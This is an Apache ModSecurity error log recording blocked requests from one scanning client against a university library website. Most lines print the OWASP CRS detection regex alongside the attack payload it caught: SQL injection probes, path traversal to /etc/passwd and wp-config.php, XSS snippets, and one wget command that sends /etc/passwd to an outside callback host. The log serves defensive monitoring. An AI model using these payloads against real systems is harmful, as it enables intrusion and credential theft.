[Tue Aug 29 11:46:42.482997 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjKyr8AAAAQ"]
[Tue Aug 29 11:46:43.667640 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhui54AAAAr"]
[Tue Aug 29 11:46:47.464138 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhui6cAAAAr"]
[Tue Aug 29 11:46:50.416268 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAhtjn4AAAAq"]
[Tue Aug 29 11:46:52.451519 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAh4Dg8AAAA2"]
[Tue Aug 29 11:46:55.658603 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjbwxQAAAAW"]
[Tue Aug 29 11:47:01.360303 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjL8SYAAAAR"]
[Tue Aug 29 11:47:01.407839 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjM7BkAAAAT"]
[Tue Aug 29 11:47:02.502194 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjXsgUAAAAG"]
[Tue Aug 29 11:47:03.437148 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAhzvpwAAAAx"]
[Tue Aug 29 11:47:05.473450 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAdxUzAAAAAC"]
[Tue Aug 29 11:47:06.556246 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DcAAAAT"]
[Tue Aug 29 11:47:06.556312 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DcAAAAT"]
[Tue Aug 29 11:47:07.525180 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavywAAAAV"]
[Tue Aug 29 11:47:07.566990 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gowe68kkpgerab.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavy4AAAAV"]
[Tue Aug 29 11:47:10.707472 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjIhoEAAAAJ"]
[Tue Aug 29 11:47:11.401654 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1cAAAAI"]
[Tue Aug 29 11:47:13.487853 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjav04AAAAV"]
[Tue Aug 29 11:47:14.371760 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAj112UAAAAa"]
[Tue Aug 29 11:47:15.433236 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjy51UAAAAG"]
[Tue Aug 29 11:47:16.353519 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAhzvq4AAAAx"]
[Tue Aug 29 11:47:16.427242 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjYrB8AAAAK"]
[Tue Aug 29 11:47:18.491592 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj114EAAAAa"]
[Tue Aug 29 11:47:19.521134 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAi@TDMAAAAM"]
[Tue Aug 29 11:47:19.570461 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjM7D0AAAAT"]
[Tue Aug 29 11:47:22.419604 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAjrbHUAAAAP"]
[Tue Aug 29 11:47:23.397565 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjKyxYAAAAQ"]
[Tue Aug 29 11:47:25.396801 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhzvrwAAAAx"]
[Tue Aug 29 11:47:25.486473 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhT4AoAAAAD"]
[Tue Aug 29 11:47:26.365166 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjZRasAAAAS"]
[Tue Aug 29 11:47:27.389684 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAjL8UcAAAAR"]
[Tue Aug 29 11:47:31.504222 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAj116cAAAAa"]
[Tue Aug 29 11:47:32.552058 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9DcAAAAA"]
[Tue Aug 29 11:47:34.614355 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbIAAAAAB"]
